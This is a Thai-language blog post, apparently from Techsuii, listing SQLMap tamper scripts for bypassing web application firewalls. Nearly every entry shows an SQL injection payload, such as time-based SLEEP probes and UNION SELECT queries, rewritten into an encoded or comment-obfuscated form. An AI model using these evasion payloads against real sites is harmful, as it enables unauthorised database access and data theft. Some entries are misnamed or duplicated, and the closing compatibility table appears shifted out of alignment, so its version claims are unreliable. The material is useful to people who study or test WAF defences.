คือช่วงนี้เห็นพยายามการ bypass WAF โดยใช้ SQLMap tamper option ก็เลยสงสัยว่าไอ้ tamper script แต่ละตัวนี่มันเอาไว้ทำอะไรบ้าง และเพื่อประหยัด tab รวมถึงกลัวหาข้อมูลไม่เจอ ก็เลยเอามาแปะไว้ในนี้ละกัน
ปล. หากใครอยากใช้ SQLMap เป็นก็ลองหาใน Youtube ละกันครับ แต่ถ้าอยากได้การสอนตั้งแต่เริ่มต้นลองดูที่ Course ดูนะครับ (แอบขายของอิอิ :D)
|
1 2 3 4 5 6 7 8 |
postrophemask.py Function: Encode quotes with utf8 Platform:All example 1 AND '1'='1 ==> 1 AND %EF%BC%871%EF%BC%87=%EF%BC%871 |
|
1 2 3 4 5 6 7 8 |
apostrophenullencode.py Function: ‘ ==> %00%27 Platform: All example 1 AND '1'='1 ==> 1 AND %00%271%00%27=%00%271 |
|
1 2 3 4 5 6 7 8 |
appendnullbyte.py Function: Space ==>% 00 Platform: Microsoft Access example 1 AND 1=1 ==> 1 AND 1=1%00 |
|
1 2 3 4 5 6 7 8 |
base64encode.py Function: base64 encode Platform: All example 1' AND SLEEP(5)# ==> MScgQU5EIFNMRUVQKDUpIw== |
|
1 2 3 4 5 6 7 8 |
between.py Function: > ==> NOT BETWEEN 0 AND Platform: Mssql2005、MySQL 4, 5.0 and 5.5、Oracle 10g、PostgreSQL 8.3, 8.4, 9.0 example 1 AND A > B-- ==> 1 AND A NOT BETWEEN 0 AND B--```、```1 AND A = B-- ==> 1 AND A BETWEEN B AND B-- |
|
1 2 3 4 5 6 7 8 |
bluecoat.py Function: Space ==>% 09 Platform: MySQL 5.1, SGOS example SELECT id FROM users WHERE id = 1 ==> SELECT%09id FROM%09users WHERE%09id LIKE 1 |
|
1 2 3 4 5 6 7 8 |
chardoubleencode.py Function: Double url encoding Platform: All example SELECT FIELD FROM%20TABLE ==> %2553%2545%254C%2545%2543%2554%2520%2546%2549%2545%254C%2544%2520%2546%2552%254F%254D%2520%2554%2541%2542%254C%2545 |
|
1 2 3 4 5 6 7 8 |
charencode.py Function: url encoding Platform: Mssql 2005、MySQL 4, 5.0 and 5.5、Oracle 10g、PostgreSQL 8.3, 8.4, 9.0 example SELECT FIELD FROM%20TABLE ==> %53%45%4C%45%43%54%20%46%49%45%4C%44%20%46%52%4F%4D%20%54%41%42%4C%45 |
|
1 2 3 4 5 6 7 8 |
charunicodeencode.py Function: escape code Platform: Mssql 2000,2005、MySQL 5.1.56、PostgreSQL 9.0.3 ASP/ASP.NET example SELECT FIELD%20FROM TABLE ==> %u0053%u0045%u004C%u0045%u0043%u0054%u0020%u0046%u0049%u0045%u004C%u0044%u0020%u0046%u0052%u004F%u004D%u0020%u0054%u0041%u0042%u004C%u0045 |
|
1 2 3 4 5 6 7 8 |
commalesslimit.py Function: limit 2,3 ==> LIMIT 3 OFFSET 2 Platform: MySQL 5.0 and 5.5 example LIMIT 2, 3 ==> LIMIT 3 OFFSET 2 |
|
1 2 3 4 5 6 7 8 |
commalessmid.py Function: MID(VERSION(), 1, 1) ==> MID(VERSION() FROM 1 FOR 1) Platform: MySQL 5.0 and 5.5 example MID(VERSION(), 1, 1) ==> MID(VERSION() FROM 1 FOR 1) |
|
1 2 3 4 5 6 7 8 |
concat2concatws.py Function: CONCAT() ==> CONCAT_WS() Platform: MySQL 5.0 example CONCAT(1,2) ==> CONCAT_WS(MID(CHAR(0),0,0),1,2) |
|
1 2 3 4 5 6 7 8 |
equaltolike.py Function: = ==> like Platform: Mssql 2005、MySQL 4, 5.0 and 5.5 example SELECT * FROM users WHERE id=1 ==> SELECT * FROM users WHERE id LIKE 1 |
|
1 2 3 4 5 6 7 8 |
escapequotes.py Function: ‘ ==> \‘、” ==> \“ Platform: All example 1" AND SLEEP(5)# ==> 1\\\\" AND SLEEP(5)# |
|
1 2 3 4 5 6 7 8 |
greatest.py Function: > ==> GREATEST Platform: MySQL 4, 5.0 and 5.5、Oracle 10g、PostgreSQL 8.3, 8.4, 9.0 example 1 AND A > B ==> 1 AND GREATEST(A,B+1)=A |
|
1 2 3 4 5 6 7 8 |
halfversionedmorekeywords.py Function: Space ==> / *! 0 Platform: MySQL 4.0.18, 5.0.22 example union ==> /*!0union |
|
1 2 3 4 5 6 7 8 |
ifnull2ifisnull.py Function: IFNULL(A, B) ==> IF(ISNULL(A), B, A) Platform: MySQL 5.0 and 5.5 example IFNULL(1, 2) ==> IF(ISNULL(1),2,1) |
|
1 2 3 4 5 6 7 8 |
informationschemacomment.py Function: Space ==> / ** / Platform: MySQL example SELECT table_name FROM INFORMATION_SCHEMA.TABLES ==> SELECT table_name FROM INFORMATION_SCHEMA/**/.TABLES |
|
1 2 3 4 5 6 7 8 |
lowercase.py Function: INSERT ==> insert Platform: Mssql 2005、MySQL 4, 5.0 and 5.5、Oracle 10g、PostgreSQL 8.3, 8.4, 9.0 example SELECT table_name FROM INFORMATION_SCHEMA.TABLES ==> select table_name from information_schema.tables |
|
1 2 3 4 5 6 7 8 |
modsecurityversioned.py Function: AND ==> /!12345AND/ Platform: MySQL 5.0 example 1 AND 2>1-- ==> 1 /*!30874AND 2>1*/-- |
|
1 2 3 4 5 6 7 8 |
multiplespaces.py Function: Space ==> multiple spaces Platform: All example 1 UNION SELECT foobar ==> 1 UNION SELECT foobar |
|
1 2 3 4 5 6 7 8 |
nonrecursivereplacement.py Function: union ==> uniunionon Platform: All example 1 UNION SELECT 2-- ==> 1 UNIOUNIONN SELESELECTCT 2-- |
|
1 2 3 4 5 6 7 8 |
overlongutf8.py Function: unicode encoding Platform: All example SELECT FIELD FROM TABLE WHERE 2>1 ==> SELECT%C0%AAFIELD%C0%AAFROM%C0%AATABLE%C0%AAWHERE%C0%AA2%C0%BE1 |
|
1 2 3 4 5 6 7 8 |
percentage.py Function: select ==> s%e%l%e%c%t Platform: Mssql 2000, 2005、MySQL 5.1.56, 5.5.11、PostgreSQL 9.0 example SELECT FIELD FROM TABLE ==> %S%E%L%E%C%T %F%I%E%L%D %F%R%O%M %T%A%B%L%E |
|
1 2 3 4 5 6 7 8 |
randomcase.py Function: INSERT ==> INseRt Platform: Mssql 2005、MySQL 4, 5.0 and 5.5、Oracle 10g、PostgreSQL 8.3, 8.4, 9.0 example INSERT ==> InseRt |
|
1 2 3 4 5 6 7 8 |
randomcomments.py Function: INSERT ==> I/**/N/**/SERT Platform: Mysql example INSERT ==> I/**/N/**/SERT |
|
1 2 3 4 5 6 7 8 |
securesphere.py Function: 1 AND 1=1 ==> 1 AND 1=1 and ‘0having’=’0having’ Platform: All example 1 AND 1=1 ==> 1 AND 1=1 and '0having'='0having' |
|
1 2 3 4 5 6 7 8 |
sp_password.py Function: Space ==> sp_password Platform: Mssql example 1 AND 9227=9227-- ==> 1 AND 9227=9227-- sp_password |
|
1 2 3 4 5 6 7 8 |
space2comment.py Function: Space ==> / ** / Platform: Mssql 2005、MySQL 4, 5.0 and 5.5、Oracle 10g、PostgreSQL 8.3, 8.4, 9.0 example SELECT id FROM users ==> SELECT/**/id/**/FROM/**/users |
|
1 2 3 4 5 6 7 8 |
space2dash.py Function: Space ==> -nVNaVoPYeva% 0A Platform:MSSQL、SQLite example 1 AND 9227=9227 ==> 1--nVNaVoPYeva%0AAND--ngNvzqu%0A9227=9227 |
|
1 2 3 4 5 6 7 8 |
space2hash.py Function: Space ==>% 23nVNaVoPYeva% 0A Platform: MySQL 4.0, 5.0 example 1 AND 9227=9227 ==> 1%23nVNaVoPYeva%0AAND%23ngNvzqu%0A9227=9227 |
|
1 2 3 4 5 6 7 8 |
space2morehash.py Function: Space ==>% 23ngNvzqu% 0A Platform: MySQL 5.1.41 example 1 AND 9227=9227 ==> 1%23ngNvzqu%0AAND%23nVNaVoPYeva%0A%23lujYFWfv%0A9227=9227 |
|
1 2 3 4 5 6 7 8 |
space2mssqlblank.py Function: Space ==> %0E Platform: Mssql 2000,2005 example SELECT id FROM users ==> SELECT%0Eid%0DFROM%07users |
|
1 2 3 4 5 6 7 8 |
space2mssqlblank.py Function: Space ==> %23%0A Platform: Mssql、Mysql example 1 AND 1=1 ==> 1%23%0AAND%23%0A9227=9227 |
|
1 2 3 4 5 6 7 8 |
space2mysqlblank.py Function: Space ==> %2B、%0D、%0C Platform: Mysql5.1 example SELECT id FROM users ==> SELECT%0Bid%0DFROM%0Cusers |
|
1 2 3 4 5 6 7 8 |
space2mysqldash.py Function: Space ==> –%0A Platform: Mssql、Mysql example 1 AND 9227=9227 ==> 1--%0AAND--%0A9227=9227 |
|
1 2 3 4 5 6 7 8 |
space2plus.py Function: Space ==> + Platform: All example SELECT id FROM users ==> SELECT+id+FROM+users |
|
1 2 3 4 5 6 7 8 |
space2randomblank.py Function: Space ==> %0D、%0A、%0C、%09 Mssql 2005、MySQL 4, 5.0 and 5.5、Oracle 10g、PostgreSQL 8.3, 8.4, 9.0 example SELECT id FROM users ==> SELECT%0Did%0DFROM%0Ausers |
|
1 2 3 4 5 6 7 8 |
symboliclogical.py Function: and ==> %26%26 Platform: All example 1 AND '1'='1 ==> 1 %26%26 '1'='1 |
|
1 2 3 |
thinkphp.py Platform: Mysql |
|
1 2 3 4 5 6 7 8 |
unionalltounion.py Function: Replace All for empty Platform: All example -1 UNION ALL SELECT ==> -1 UNION SELECT\ |
|
1 2 3 4 5 6 7 8 |
unmagicquotes.py Function: ‘ ==> %df%27 Platform: Mysql magic_quotes/addslashes example 1' AND 1=1 ==> 1%bf%27-- |
|
1 2 3 4 5 6 7 8 |
uppercase.py Function: Lower case capitalization Platform: Mssql 2005、MySQL 4, 5.0 and 5.5、Oracle 10g、PostgreSQL 8.3, 8.4, 9.0 example insert ==> INSERT |
|
1 2 3 4 5 6 |
varnish.py Function: add header example X-originating-IP: 127.0.0.1 |
|
1 2 3 4 5 6 7 8 |
versionedkeywords.py Function: union ==> /!union/ Platform: MySQL 4.0.18, 5.1.56, 5.5.11 example 1 union select user() ==> 1/*!UNION*//*!SELECT*/user() |
|
1 2 3 4 5 6 7 8 |
versionedmorekeywords.py Function: union ==> /!union/ Platform: MySQL 5.1.56, 5.5.11 example 1 union select user() ==> 1/*!UNION*//*!SELECT*/user() |
|
1 2 3 4 5 6 7 8 |
xforwardedfor.py Function: X-Forwarded-For random head Platform: All example X-Forwarded-For: 127.0.0.1 |
| TAMPER | MySQL | MSSQL | Oracle | PostgreSQL |
|---|---|---|---|---|
| apostrophemask | * | * | * | * |
| apostrophenullencode | – | – | – | – |
| appendnullbyte | * | * | * | * |
| base64encode | 4,5,5.5 | 2005 | 10g | – |
| between | 5.1 | – | – | – |
| bluecoat | * | * | * | * |
| apostrophemask | 9.0.3 | 2000,2005 | – | 9.3 |
| charunicodeencode | 4,5.0 and 5.5 | 2005 | 10g | 8.3,8.4,9.0 |
| charencode | * | – | – | – |
| commalessmid | * | – | – | – |
| concat2concatws | * | * | * | * |
| equaltolike | * | * | * | * |
| greatest | < 5.1 | – | – | – |
| halfversionedmorekeywords | 5.0 and 5.5 | – | – | – |
| ifnull2ifisnull | * | * | * | * |
| informationschemacomment | 4,5.0,5.5 | 2005 | 10g | 8.3,8.4,9.0 |
| lowercase | 5.0 | – | – | – |
| modsecurityversioned | 5.0 | – | – | – |
| modsecurityzeroversioned | * | * | * | * |
| multiplespaces | * | * | * | * |
| nonrecursivereplacement | * | * | * | * |
| overlongutf8 | 5.1.56,5.5.11 | 2000, 2005 | N/A | 9.0 |
| percentage | 4, 5.0,5.5 | 2005 | 10g | 8.3,8.4,9.0 |
| randomcase | * | * | * | * |
| randomcomments | * | * | * | * |
| securesphere | 4,5.0,5.5 | 2005 | 10g | 8.3,8.4,9.0 |
| space2comment | – | – | – | – |
| space2dash | 4.0,5.0 | – | – | – |
| space2hash | >= 5.1.13 | – | – | – |
| space2morehash | – | 2000, 2005 | – | – |
| space2mssqlblank | * | * | – | – |
| space2mssqlhash | * | * | * | * |
| space2plus | 4,5.0,5.5 | 2005 | 10g | 8.3,8.4,9.0 |
| space2randomblank | – | * | – | – |
| sp_password | * | * | * | * |
| symboliclogical | * | * | * | * |
| unionalltounion | * | * | * | * |
| unmagicquotes | 4, 5.0,5.5 | 2005 | 10g | 8.3,8.4,9.0 |
| uppercase | * | * | * | * |
| varnish | * | – | – | – |
| versionedkeywords | >=5.1.13 | – | – | – |
| versionedmorekeywords | * | * | * | * |
| xforwardedfor | * | * | * | * |
(*) It might work for all versions.
(-) Does not apply
LINE@Techsuii.com
